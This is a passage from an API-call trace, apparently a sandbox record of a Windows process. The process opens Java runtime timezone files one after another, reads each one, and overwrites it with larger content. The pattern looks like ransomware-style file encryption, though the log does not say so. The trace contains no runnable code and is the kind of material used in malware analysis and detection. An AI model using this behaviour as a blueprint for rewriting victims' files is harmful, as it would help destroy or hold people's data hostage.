dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.949] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.949] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x5d [0130.949] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.949] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.950] ReleaseMutex (hMutex=0x168) returned 1 [0130.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dili", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0130.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dili", cchWideChar=4, lpMultiByteStr=0x1f7ace4, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dili", lpUsedDefaultChar=0x0) returned 4 [0130.950] ReadFile (in: hFile=0x204, lpBuffer=0x1f56778, nNumberOfBytesToRead=0x5d, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56778*, lpNumberOfBytesRead=0x345f2bc*=0x5d, lpOverlapped=0x0) returned 1 [0130.951] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.951] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x5e5, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5e5, lpOverlapped=0x0) returned 1 [0130.951] CloseHandle (hObject=0x204) returned 1 [0130.951] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ho_Chi_Minh" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ho_chi_minh"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.952] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.952] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x61 [0130.952] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.952] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.952] ReleaseMutex (hMutex=0x168) returned 1 [0130.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ho_Chi_Minh", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ho_Chi_Minh", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ho_Chi_Minh", lpUsedDefaultChar=0x0) returned 11 [0130.953] ReadFile (in: hFile=0x204, lpBuffer=0x1f56778, nNumberOfBytesToRead=0x61, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56778*, lpNumberOfBytesRead=0x345f2bc*=0x61, lpOverlapped=0x0) returned 1 [0130.954] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.954] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x5e9, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5e9, lpOverlapped=0x0) returned 1 [0130.954] CloseHandle (hObject=0x204) returned 1 [0130.954] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kashgar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kashgar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.955] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.955] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xc1 [0130.956] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.956] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.956] ReleaseMutex (hMutex=0x168) returned 1 [0130.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kashgar", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0130.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kashgar", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kashgar", lpUsedDefaultChar=0x0) returned 7 [0130.956] ReadFile (in: hFile=0x204, lpBuffer=0x1ee0918, nNumberOfBytesToRead=0xc1, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0918*, lpNumberOfBytesRead=0x345f2bc*=0xc1, lpOverlapped=0x0) returned 1 [0130.957] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.957] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x649, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x345f2d0*=0x649, lpOverlapped=0x0) returned 1 [0130.957] CloseHandle (hObject=0x204) returned 1 [0130.957] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Macau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\macau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.958] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.958] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x189 [0130.958] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.958] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.959] ReleaseMutex (hMutex=0x168) returned 1 [0130.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Macau", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Macau", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Macau", lpUsedDefaultChar=0x0) returned 5 [0130.959] ReadFile (in: hFile=0x204, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x189, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x345f2bc*=0x189, lpOverlapped=0x0) returned 1 [0130.960] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.960] WriteFile (in: hFile=0x204, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x711, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x345f2d0*=0x711, lpOverlapped=0x0) returned 1 [0130.960] CloseHandle (hObject=0x204) returned 1 [0130.960] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Omsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\omsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.961] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.961] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x245 [0130.961] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.962] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.962] ReleaseMutex (hMutex=0x168) returned 1 [0130.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Omsk", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0130.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Omsk", cchWideChar=4, lpMultiByteStr=0x1f7ace4, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Omsk", lpUsedDefaultChar=0x0) returned 4 [0130.962] ReadFile (in: hFile=0x204, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x245, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x345f2bc*=0x245, lpOverlapped=0x0) returned 1 [0130.963] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.963] WriteFile (in: hFile=0x204, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x7cd, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x345f2d0*=0x7cd, lpOverlapped=0x0) returned 1 [0130.964] CloseHandle (hObject=0x204) returned 1 [0130.964] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.965] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.965] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x41 [0130.965] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.965] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.965] ReleaseMutex (hMutex=0x168) returned 1 [0130.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riyadh", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0130.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riyadh", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Riyadh", lpUsedDefaultChar=0x0) returned 6 [0130.965] ReadFile (in: hFile=0x204, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x345f2bc*=0x41, lpOverlapped=0x0) returned 1 [0130.966] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.966] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0130.966] CloseHandle (hObject=0x204) returned 1 [0130.967] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Singapore" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\singapore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.973] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.974] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x85 [0130.974] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.974] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.974] ReleaseMutex (hMutex=0x168) returned 1 [0130.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Singapore", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Singapore", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Singapore", lpUsedDefaultChar=0x0) returned 9 [0130.974] ReadFile (in: hFile=0x204, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x345f2bc*=0x85, lpOverlapped=0x0) returned 1 [0130.975] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.975] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x345f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0130.976] CloseHandle (hObject=0x204) returned 1 [0130.976] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Urumqi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\urumqi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.977] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.977] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb5 [0130.977] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.977] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.977] ReleaseMutex (hMutex=0x168) returned 1 [0130.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Urumqi", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0130.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Urumqi", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Urumqi", lpUsedDefaultChar=0x0) returned 6 [0130.978] ReadFile (in: hFile=0x204, lpBuffer=0x1ee0918, nNumberOfBytesToRead=0xb5, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0918*, lpNumberOfBytesRead=0x345f2bc*=0xb5, lpOverlapped=0x0) returned 1 [0130.979] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.979] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63d, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x345f2d0*=0x63d, lpOverlapped=0x0) returned 1 [0130.979] CloseHandle (hObject=0x204) returned 1 [0130.979] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Bermuda" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\bermuda"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.984] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.984] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x464 [0130.984] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.984] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.984] ReleaseMutex (hMutex=0x168) returned 1 [0130.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bermuda", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0130.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bermuda", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bermuda", lpUsedDefaultChar=0x0) returned 7 [0130.985] ReadFile (in: hFile=0x204, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x464, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x345f2bc*=0x464, lpOverlapped=0x0) returned 1 [0131.003] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0131.003] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9ec, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x345f2d0*=0x9ec, lpOverlapped=0x0) returned 1 [0131.003] CloseHandle (hObject=0x204) returned 1 [0131.003] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\St_Helena" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\st_helena"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0131.004] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.004] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x41 [0131.004] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.004] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.004] ReleaseMutex (hMutex=0x168) returned 1 [0131.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="St_Helena", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0131.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="St_Helena", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="St_Helena", lpUsedDefaultChar=0x0) returned 9 [0131.004] ReadFile (in: hFile=0x204, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x345f2bc*=0x41, lpOverlapped=0x0) returned 1 [0131.006] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0131.006] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0131.006] CloseHandle (hObject=0x204) returned 1 [0131.006] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lindeman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lindeman"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0131.009] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.009] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xdd [0131.010] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.010] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.010] ReleaseMutex (hMutex=0x168) returned 1 [0131.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lindeman", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0131.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lindeman", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lindeman", lpUsedDefaultChar=0x0) returned 8 [0131.010] ReadFile (in: hFile=0x204, lpBuffer=0x1ee41f8, nNumberOfBytesToRead=0xdd, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee41f8*, lpNumberOfBytesRead=0x345f2bc*=0xdd, lpOverlapped=0x0) returned 1 [0131.011] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0131.011] WriteFile (in: hFile=0x204, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x665, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x345f2d0*=0x665, lpOverlapped=0x0) returned 1 [0131.012] CloseHandle (hObject=0x204) returned 1 [0131.012] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0131.013] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: 